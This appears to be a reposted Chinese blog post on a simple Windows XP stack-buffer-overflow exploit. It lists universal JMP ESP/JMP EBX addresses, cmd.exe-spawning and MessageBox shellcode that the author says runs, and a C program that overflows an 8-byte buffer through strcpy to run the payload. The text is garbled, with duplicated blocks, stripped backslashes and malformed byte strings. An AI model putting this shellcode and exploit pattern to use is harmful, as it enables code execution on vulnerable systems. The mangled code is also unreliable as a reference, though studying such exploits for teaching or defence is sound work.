概述
对Windows 2000、XP、2003都通用的具有JMP
EBX功能的地址是0x7ffa1571,通用的具有JMP ESP功能的地址是0x7ffa4512。
EBX功能的地址是0x7ffa1571,通用的具有JMP ESP功能的地址是0x7ffa4512。
弹出cmd.exe的shellcode是
"x55x8BxECx50x50x50xB8x4Dx53x56x43x89x45"
"xF4xB8x52x54x2Ex44x89x45xF8xC6x45xFC"
"x4CxC6x45xFDx4Cx8Dx45F4x50xBA"
"x77x1Dx80x7C" //Address of LoadLibraryA in WinXPSP2
"xFFxD2x55x8BxECx83xECx0CxB8x43x4Dx44x2E"
"x89x45xF8xC6x45xFCx45xC6x45xFDx58xC645xFE"
"x45x33xD2x88x55xFFx8Dx45xF8x50xB8"
"xC7x93xBFx77" //Address of system in WinXPSP2
"xFFxD0" ;
"xF4xB8x52x54x2Ex44x89x45xF8xC6x45xFC"
"x4CxC6x45xFDx4Cx8Dx45F4x50xBA"
"x77x1Dx80x7C" //Address of LoadLibraryA in WinXPSP2
"xFFxD2x55x8BxECx83xECx0CxB8x43x4Dx44x2E"
"x89x45xF8xC6x45xFCx45xC6x45xFDx58xC645xFE"
"x45x33xD2x88x55xFFx8Dx45xF8x50xB8"
"xC7x93xBFx77" //Address of system in WinXPSP2
"xFFxD0" ;
弹出对话框的shellcode
unsigned char sh4llcode[] =""
"xE9xA7x00x00x00x5Ax64xA1x30x00x00x00x8Bx40x0Cx8B"
"x70x1CxADx8Bx40x08x50x52x6Ax0CxE8x2Fx00x00x00x5B"
"x83xC3x0Dx53xFFxD0x83xC3x07x53x6Ax0BxE8x1Dx00x00"
"x00x5Bx83xC3x18x6Ax00x53x53x6Ax00xFFxD0xBAx0Cx00"
"x00x00x58x2BxDAx53x52xE8x02x00x00x00xFFxD0x8BxD8"
"x83xC0x3Cx8Bx00x03xC3x80x38x50x75x49x8Bx40x78x03"
"xC3x50x8BxC8x8Bx49x14x8Bx40x20x03xC3x55x8BxE8x33"
"xD2x51x8Bx00x03xC3x8BxF8x8Bx74x24x14x8Bx4Cx24x10"
"xFCxF3xA6x75x17x83xC4x04x8Bx44x24x04x8Bx40x1Cx03"
"xC3xC1xE2x02x03xC2x8Bx00x03xC3xEBx0Bx42x83xC5x04"
"x8BxC5x59xE2xCCx33xC0x5Dx59xC2x04x00xE8x54xFFxFF"
"xFFx4Cx6Fx61x64x4Cx69x62x72x61x72x79x41x00x75x73"
"x65x72x33x32x00x4Dx65x73x73x61x67x65x42x6Fx78x41"
"x00x45x78x69x74x50x72x6Fx63x65x73x73x00"
"OK"
;
上面两个绝对可以使用 ,我在win xp sp2 vc 6.0 下编译通过 并执行成功
"xE9xA7x00x00x00x5Ax64xA1x30x00x00x00x8Bx40x0Cx8B"
"x70x1CxADx8Bx40x08x50x52x6Ax0CxE8x2Fx00x00x00x5B"
"x83xC3x0Dx53xFFxD0x83xC3x07x53x6Ax0BxE8x1Dx00x00"
"x00x5Bx83xC3x18x6Ax00x53x53x6Ax00xFFxD0xBAx0Cx00"
"x00x00x58x2BxDAx53x52xE8x02x00x00x00xFFxD0x8BxD8"
"x83xC0x3Cx8Bx00x03xC3x80x38x50x75x49x8Bx40x78x03"
"xC3x50x8BxC8x8Bx49x14x8Bx40x20x03xC3x55x8BxE8x33"
"xD2x51x8Bx00x03xC3x8BxF8x8Bx74x24x14x8Bx4Cx24x10"
"xFCxF3xA6x75x17x83xC4x04x8Bx44x24x04x8Bx40x1Cx03"
"xC3xC1xE2x02x03xC2x8Bx00x03xC3xEBx0Bx42x83xC5x04"
"x8BxC5x59xE2xCCx33xC0x5Dx59xC2x04x00xE8x54xFFxFF"
"xFFx4Cx6Fx61x64x4Cx69x62x72x61x72x79x41x00x75x73"
"x65x72x33x32x00x4Dx65x73x73x61x67x65x42x6Fx78x41"
"x00x45x78x69x74x50x72x6Fx63x65x73x73x00"
"OK"
;
上面两个绝对可以使用 ,我在win xp sp2 vc 6.0 下编译通过 并执行成功
下面是测试代码
#i nclude "stdio.h"
#i nclude "stdlib.h"
#i nclude "string.h"
#i nclude "windows.h"
char name[]=
"x41x41x41x41"
"x41x41x41x41"
"x41x41x41x41"
"x12x45xfax7f" // 0x7ffa4512
"x55x8BxECx50x50x50xB8x4Dx53x56x43x89x45"
"xF4xB8x52x54x2Ex44x89x45xF8xC6x45xFC"
"x4CxC6x45xFDx4Cx8Dx45xF4x50xBA"
"x77x1Dx80x7C" //Address of LoadLibraryA in WinXPSP2
"xFFxD2x55x8BxECx83xECx0CxB8x43x4Dx44x2E"
"x89x45xF8xC6x45xFCx45xC6x45xFDx58xC6x45xFE"
"x45x33xD2x88x55xFFx8Dx45xF8x50xB8"
"xC7x93xBFx77" //Address of system in WinXPSP2
"xFFxD0";
#i nclude "stdlib.h"
#i nclude "string.h"
#i nclude "windows.h"
char name[]=
"x41x41x41x41"
"x41x41x41x41"
"x41x41x41x41"
"x12x45xfax7f" // 0x7ffa4512
"x55x8BxECx50x50x50xB8x4Dx53x56x43x89x45"
"xF4xB8x52x54x2Ex44x89x45xF8xC6x45xFC"
"x4CxC6x45xFDx4Cx8Dx45xF4x50xBA"
"x77x1Dx80x7C" //Address of LoadLibraryA in WinXPSP2
"xFFxD2x55x8BxECx83xECx0CxB8x43x4Dx44x2E"
"x89x45xF8xC6x45xFCx45xC6x45xFDx58xC6x45xFE"
"x45x33xD2x88x55xFFx8Dx45xF8x50xB8"
"xC7x93xBFx77" //Address of system in WinXPSP2
"xFFxD0";
int overflow(char *str){
char buf[8];
strcpy(buf,str);
return 1;
}
char buf[8];
strcpy(buf,str);
return 1;
}
int main(){
int i;
overflow(name);
return 0;
}
转载于:https://www.cnblogs.com/herso/archive/2009/03/22/1419024.html
最后
以上就是哭泣苗条为你收集整理的2006-10-29 22:50:00 自己写的一个简单的溢出程序的全部内容,希望文章能够帮你解决2006-10-29 22:50:00 自己写的一个简单的溢出程序所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复